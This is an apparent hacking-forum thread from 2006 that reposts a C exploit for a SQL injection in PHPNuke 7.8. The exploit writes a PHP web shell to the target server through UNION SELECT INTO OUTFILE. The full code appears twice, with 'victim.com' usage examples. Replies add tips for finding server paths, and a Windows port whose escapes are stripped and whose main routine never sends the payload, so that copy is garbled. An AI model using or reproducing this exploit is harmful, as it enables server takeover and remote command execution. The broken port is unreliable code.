/*==================================================\
# SecurityReason.com |
# ( sp3x ) sp3x@securtiyreason.com |
# |
# /---------------------------\ |
# | Ctitical SQL INCJECTION | |
# | PHPNuke <= 7.8 | |
# \---------------------------/ |
# |
# PHPNuke-sp3x[1] |
# This exploit is based on 'username' |
# SQL injection vuln in Your_Account module. |
# |
# References: |
# securityreason.com/achievement_securityalert/32 |
# |
# ---| work only on mysql version > 4.0 |--- |
# |
#==================================================*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 80 // port of the web server
void begin(void);
void sqlinj(int sock, char *argv[]);
int main(int argc, char *argv[]){
int sock;
struct sockaddr_in addr;
struct hostent *hp=0;
if(argc!=4) {
begin();
}
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\n\n[-] Creating socket [FAILED]\n\n");
exit(EXIT_FAILURE);
}
printf("\n\n[+] Creating socket [OK]\n");
if((hp = gethostbyname(argv[1])) == 0) {
printf("[-] Resolving %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}
printf("[+] Resolving %s [OK]\n", argv[1]);
memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
printf("[-] Connecting at %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}
printf("[+] Connecting at %s [OK]\n", argv[1]);
sqlinj(sock, argv);
printf("[+] Now check the shell\n"
"[+] http://%s\n\n",argv[1]);
shutdown(sock, 2);
close(sock);
return(0);
}
void begin(void){
printf("*---------------------------------------*\n"
"* SecurityReason *\n"
"* EXPLOIT for PHPNuke <=7.8 *\n"
"* Coded by : sp3x Date : 16.02.2006 *\n"
"*---------------------------------------*\n\n"
" Usage : \n"
" PHPNuke-sp3x[1] HOST /[path_phpnuke] [s_directory]\n\n"
" HOST - Host where is phpnuke example: localhost \n"
" [path_phpnuke] - PHPNuke directory\n"
" [s_directory] - shell directory where to upload\n\n"
" Example :\n\n"
" PHPNuke-sp3x[1] www.victim.com /phpnuke/html/ /home/sp3x/nuke78/html/shell.php \n"
" After this go to http://www.victim.com/phpnuke/html/shell.php?sr=ls \n\n");
exit(0);
return;
}
void sqlinj(int sock, char *argv[]){
FILE *go;
int size = 264;
go = fdopen(sock,"a");
if (go == 0) {
perror("[-] fdopen [FAILED]\n\n");
close(sock);
exit(EXIT_FAILURE);
}
setbuf(go,NULL);
size+=strlen(argv[3]);
fprintf(go,"POST %s HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Referer: http://%s%s?name=Your_Account&op=new user\n"
"User-Agent: SecurityReason - [SR]\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"name=Your_Account&op=new user&user_email=securitybreak@securityreason.com&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<? echo \"SecurityReason Shell\";system($_GET[sr]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n"
"Cookie: lang=english\r\n\r\n",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
printf("[+] Sending exploit [OK]\n\n");
}
Sponsored by: █ Sparkhost - Hosting Without Compromises! █ Hybrid Performance Web Hosting █ Spark Host Stream Hosting █ Hybrid IRC & IRCd Server Shell Accounts
Phpnuke <=7.8 Sql Injection Exploit
Started by
pita
, Feb 17 2006 06:37 AM
4 replies to this topic
#1
pita
-
- Members
-
- 153 posts
Corporal
Posted 17 February 2006 - 06:37 AM
#3 Guest_sirh0t_*
Guest_sirh0t_*
-
- Guests
Posted 18 February 2006 - 06:15 PM
/*==================================================\
# SecurityReason.com |
# ( sp3x ) sp3x@securtiyreason.com |
# |
# /---------------------------\ |
# | Ctitical SQL INCJECTION | |
# | PHPNuke <= 7.8 | |
# \---------------------------/ |
# |
# PHPNuke-sp3x[1] |
# This exploit is based on 'username' |
# SQL injection vuln in Your_Account module. |
# |
# References: |
# securityreason.com/achievement_securityalert/32 |
# |
# ---| work only on mysql version > 4.0 |--- |
# |
#==================================================*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 80 // port of the web server
void begin(void);
void sqlinj(int sock, char *argv[]);
int main(int argc, char *argv[]){
int sock;
struct sockaddr_in addr;
struct hostent *hp=0;
if(argc!=4) {
begin();
}
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\n\n[-] Creating socket [FAILED]\n\n");
exit(EXIT_FAILURE);
}
printf("\n\n[+] Creating socket [OK]\n");
if((hp = gethostbyname(argv[1])) == 0) {
printf("[-] Resolving %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}
printf("[+] Resolving %s [OK]\n", argv[1]);
memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
printf("[-] Connecting at %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}
printf("[+] Connecting at %s [OK]\n", argv[1]);
sqlinj(sock, argv);
printf("[+] Now check the shell\n"
"[+] http://%s\n\n",argv[1]);
shutdown(sock, 2);
close(sock);
return(0);
}
void begin(void){
printf("*---------------------------------------*\n"
"* SecurityReason *\n"
"* EXPLOIT for PHPNuke <=7.8 *\n"
"* Coded by : sp3x Date : 16.02.2006 *\n"
"*---------------------------------------*\n\n"
" Usage : \n"
" PHPNuke-sp3x[1] HOST /[path_phpnuke] [s_directory]\n\n"
" HOST - Host where is phpnuke example: localhost \n"
" [path_phpnuke] - PHPNuke directory\n"
" [s_directory] - shell directory where to upload\n\n"
" Example :\n\n"
" PHPNuke-sp3x[1] www.victim.com /phpnuke/html/ /home/sp3x/nuke78/html/shell.php \n"
" After this go to http://www.victim.com/phpnuke/html/shell.php?sr=ls \n\n");
exit(0);
return;
}
void sqlinj(int sock, char *argv[]){
FILE *go;
int size = 264;
go = fdopen(sock,"a");
if (go == 0) {
perror("[-] fdopen [FAILED]\n\n");
close(sock);
exit(EXIT_FAILURE);
}
setbuf(go,NULL);
size+=strlen(argv[3]);
fprintf(go,"POST %s HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Referer: http://%s%s?name=Your_Account&op=new user\n"
"User-Agent: SecurityReason - [SR]\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"name=Your_Account&op=new user&user_email=securitybreak@securityreason.com&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<? echo \"SecurityReason Shell\";system($_GET[sr]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n"
"Cookie: lang=english\r\n\r\n",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
printf("[+] Sending exploit [OK]\n\n");
}it was shit for me I didnt had writable dirs btw to find local path just search site:bleeh.com error / then some strings that showed by error or just create error by ur self to see it
#4
donk0yote
-
- Members
-
- 19 posts
Private
Posted 18 February 2006 - 08:08 PM
if((hp = gethostbyname(argv[1])) == 0) {
printf("[-] Resolving %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}
something wrong here? it compiles fine but i always get an error:
[+]Creating socket [OK]
[-] Resolving ACME://someurl.com [FAILED]
#5
roxi
-
- Members
-
- 27 posts
Private First Class
Posted 19 February 2006 - 05:19 AM
/*
____ ____ __
| | | | | | | /
| | | | | |___/
| | --- | |----| |
|____| |____ | | |____| __/
Copyright (C) 2006 Untruth Labs
--------------------------------------------------------------------------------
Critical SQL Injection PHPNuke <= 7.8 - Your_Account
founded by sp3x from www.securtiyreason.com
This exploit is based on this exploit:
http://securityreason.com/achievement_exploitalert/7
--------------------------------------------------------------------------------
recoded for windows (winsock): by unitedbr Date: 17.02.2006
Compiled in VC++
C:@PastinhaArea_de_Testescppphpnuke7.8>cl phpnuke78.cpp
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86
Copyright (C) Microsoft Corp 1984-1998. All rights reserved.
phpnuke78.cpp
Microsoft (R) Incremental Linker Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
/out:phpnuke78.exe
phpnuke78.obj
C:@PastinhaArea_de_Testescppphpnuke7.8>
--------------------------------------------------------------------------------
C:@PastinhaArea_de_Testescppphpnuke7.8>phpnuke78
############################################################
# Untruth Labs presents #
# #
# EXPLOIT for PHPNuke <= 7.8 #
# Original code by: sp3x - Date: 16.02.2006 #
# http://securityreason.com/achievement_exploitalert/7 #
# #
# Recoded for windows: by unitedbr #
# Date: 17.02.2006 #
############################################################
Usage :
phpnuke78 HOST /[path_phpnuke] [s_directory]
HOST - Host where is phpnuke example: localhost
[path_phpnuke] - PHPNuke directory
[s_directory] - shell directory where to upload
Example :
phpnuke78 www.victim.com /phpnuke/html/ /home/unitedbr/nuke78/html/shell.php
After this go to http://www.victim.com/phpnuke/html/shell.php?sr=ls
C:@PastinhaArea_de_Testescppphpnuke7.8>
--------------------------------------------------------------------------------
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#define PORT 80
void usage(void);
void sqlinj(SOCKET sock, char *argv[]);
int main(int argc, char *argv[])
{
int i, count;
WSADATA wsaData;
/* Winsock start up */
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
{
printf("[x] Error at WSAStartup()n");
exit(EXIT_FAILURE);
}
if(argc != 4)
usage();
// Create a socket.
SOCKET sock;
sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ( sock == INVALID_SOCKET ) {
printf( "n[x] Creating socket error: %ld [FAILED]n", WSAGetLastError() );
WSACleanup();
exit(EXIT_FAILURE);
}
printf("n[!] Creating socket [OK]n");
struct hostent *he;
struct sockaddr_in addr;
/* get IP address of other end */
he = gethostbyname(argv[1]);
if(he == NULL)
{
printf("[x] Resolving "%s" [FAILED]n", argv[1]);
exit(EXIT_FAILURE);
}
printf("[!] Resolving "%s" [OK]n", argv[1]);
memset(&addr, 0, sizeof(addr));
memcpy((char*)&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
/* connecting */
if( connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == SOCKET_ERROR)
{
printf("[x] Connecting at %s [FAILED]n", argv[1] );
WSACleanup();
exit(EXIT_FAILURE);
}
printf("[!] Connecting at %s [OK]n", argv[1]);
printf("[!] Now check the shelln"
"[!] http://%snn",argv[1]);
WSACleanup();
closesocket(sock);
return 0;
}
void usage(void)
{
printf("nn############################################################n"
"# Untruth Labs presents #n"
"# #n"
"# EXPLOIT for PHPNuke <= 7.8 #n"
"# Original code by: sp3x - Date: 16.02.2006 #n"
"# http://securityreason.com/achievement_exploitalert/7 #n"
"# #n"
"# Recoded for windows: by unitedbr #n"
"# Date: 17.02.2006 #n"
"############################################################nn"
" Usage : n"
" phpnuke78 HOST /[path_phpnuke] [s_directory]nn"
" HOST - Host where is phpnuke example: localhost n"
" [path_phpnuke] - PHPNuke directoryn"
" [s_directory] - shell directory where to uploadnn"
" Example :nn"
" phpnuke78 www.victim.com /phpnuke/html/ /home/unitedbr/nuke78/html/shell
.phpn"
" After this go to http://www.victim.com/phpnuke/html/shell.php?cmd=ls nn
");
exit(EXIT_SUCCESS);
}
void sqlinj(SOCKET sock, char *argv[])
{
FILE *go;
int size = 264;
go = fdopen(sock,"a");
if (go == 0)
{
perror("[x] fdopen [FAILED]nn");
closesocket(sock);
exit(EXIT_FAILURE);
}
setbuf(go,NULL);
size+=strlen(argv[3]);
fprintf(go,"POST %s HTTP/1.0n"
"Connection: Keep-Aliven"
"Pragma: no-cachen"
"Cache-control: no-cachen"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identityn"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5n"
"Accept-Language: enn"
"Host: %sn"
"Referer: http://%s%s?name=Your_Account&op=new usern"
"User-Agent: SecurityReason - [SR]n"
"Content-Type: application/x-www-form-urlencodedn"
"Content-Length: %dnn"
"name=Your_Account&op=new user&user_email=unitedbr@u-labs.org&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<? echo "Untruth Shell";system($_GET[cmd]);'/**/FR
OM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*nn"
"Cookie: lang=englishrnrn",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
printf("[!] Sending exploit [OK]nn");
}For win
Source : securityreason.com/exploitalert/319
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users
